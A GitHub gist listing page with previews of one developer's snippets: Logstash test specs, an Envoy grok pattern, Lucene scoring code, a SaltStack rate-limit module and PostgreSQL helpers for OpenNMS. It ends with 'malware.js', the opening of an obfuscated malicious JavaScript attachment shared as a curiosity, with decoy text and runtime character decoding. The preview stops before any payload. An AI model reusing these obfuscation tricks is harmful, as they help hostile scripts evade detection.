Skip to content

Instantly share code, notes, and snippets.

Umberto Nicoletti unicolet

Block or report user

Report or block unicolet

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View logstash_skip_inputs.rb
def load_our_config(all=false)
files = Dir['conf.d/*.conf']
@@configuration = String.new
files.sort.each do |file|
if all
@@configuration << File.read(file)
elsif file !~ /output/ and file !~ /input/
@@configuration << File.read(file)
end
end
View logstash_spec.rb
# encoding: utf-8
require "logstash/devutils/rspec/spec_helper"
describe "filebeat-forwarded plain text log" do
files = Dir['conf.d/*.conf']
@@configuration = String.new
files.sort.each do |file|
@@configuration << File.read(file)
end
View envoy.grok
# envoy default log format:
# https://www.envoyproxy.io/docs/envoy/latest/configuration/access_log#config-access-log-default-format
#
# [%START_TIME%] "%REQ(:METHOD)% %REQ(X-ENVOY-ORIGINAL-PATH?:PATH)% %PROTOCOL%"
# %RESPONSE_CODE% %RESPONSE_FLAGS% %BYTES_RECEIVED% %BYTES_SENT% %DURATION%
# %RESP(X-ENVOY-UPSTREAM-SERVICE-TIME)% "%REQ(X-FORWARDED-FOR)%" "%REQ(USER-AGENT)%"
# "%REQ(X-REQUEST-ID)%" "%REQ(:AUTHORITY)%" "%UPSTREAM_HOST%"
#
ENVOY \[%{TIMESTAMP_ISO8601:timestamp}\] "%{DATA:method} %{DATA:original_path} %{DATA:protocol}" %{DATA:response_code} %{DATA:response_flags} %{NUMBER:bytes_rcvd} %{NUMBER:bytes_sent} %{NUMBER:duration} %{DATA:upstream_svc_time} "%{DATA:x-forwarded-for}" "%{DATA:useragent}" "%{DATA:request_id}" "%{DATA:authority}" "%{DATA:upstream_host}"
View fosdem2018_compilation.md
View score.java
public BulkScorer bulkScorer(LeafReaderContext context) throws IOException {
final float score = score();
final int maxDoc = context.reader().maxDoc();
return new BulkScorer() {
@Override
public int score(LeafCollector collector, Bits acceptDocs, int min, int max) throws IOException {
max = Math.min(max, maxDoc);
FakeScorer scorer = new FakeScorer();
scorer.score = score;
collector.setScorer(scorer);
View example_spec.rb
# encoding: utf-8
require "logstash/devutils/rspec/spec_helper"
files = Dir['conf.d/*.conf']
@@configuration = String.new
files.sort.each do |file|
@@configuration << File.read(file)
end
describe "simple test" do
View .kitchen.yml
provisioner:
omnibus_cachier: true
name: salt_solo
formula: service
state_top:
base:
"*":
- service
@unicolet
unicolet / ratelimit.py
Last active May 10, 2016
Warning: crude hack ahead! Implement a rate limiting state module for SaltStack reactors. State is maintained in a sqlite database.
View ratelimit.py
import salt.exceptions
import logging
import time
__name__ = 'ratelimit'
log = logging.getLogger(__name__)
def event(name, event_in, event_out):
bucket = {}
@unicolet
unicolet / opennms_event_param_functions.sql
Last active Apr 22, 2016
Two postgres functions to retrieve param values from OpenNMS events.eventparms column. Tested on postgres 9.4
View opennms_event_param_functions.sql
CREATE OR REPLACE FUNCTION event_pval_num(p_eventparams text, p_param text) RETURNS integer AS $$
BEGIN
RETURN (regexp_matches(p_eventparams,p_param||'=(\d+)'))[1];
END;
$$ LANGUAGE plpgsql;
CREATE OR REPLACE FUNCTION event_pval_txt(p_eventparams text, p_param text) RETURNS text AS $$
BEGIN
RETURN (regexp_matches(p_eventparams,p_param||'=(.*?)\(string'))[1];
END;
@unicolet
unicolet / malware.js
Created Apr 4, 2016
Received this in a zip attachment. Just look at all that evasion text.
View malware.js
dnWuANlWi = "} An object can be passed to jQuery.data instead of a key/value pair; this gets shallow copied over onto the existing cache if ( typeof name === \"object\" || typeof name === \"function\" ) { if ( pvt ) { cache[ id ] = jQuery.extend( cache[ id ], name ); } else { cache[ id ].data = jQuery.extend( cache[ id ].data, name ); } ";
var enter = 0;
var enter1 = 7*2*7 + enter;
nixon = String[("context","approve","referrals","accrue","f")+("productivity","rolled","executed","ro")+"mC"+"ha"+("fossil","yorkshire","disrespect","explicitly","rC")+"ode"]( enter1);
var enter2 = 3/3;
String.prototype.borax = function () {
var catalogues = {
repel: this
};
catalogues.beach = catalogues.repel[("s"+("driver","legendary","teutonic","fought","uZ")+"st"+("achieved","cNkHLjlL","misleading","flinch","ring")).replace("Z", nixon)](enter, enter2);
You can’t perform that action at this time.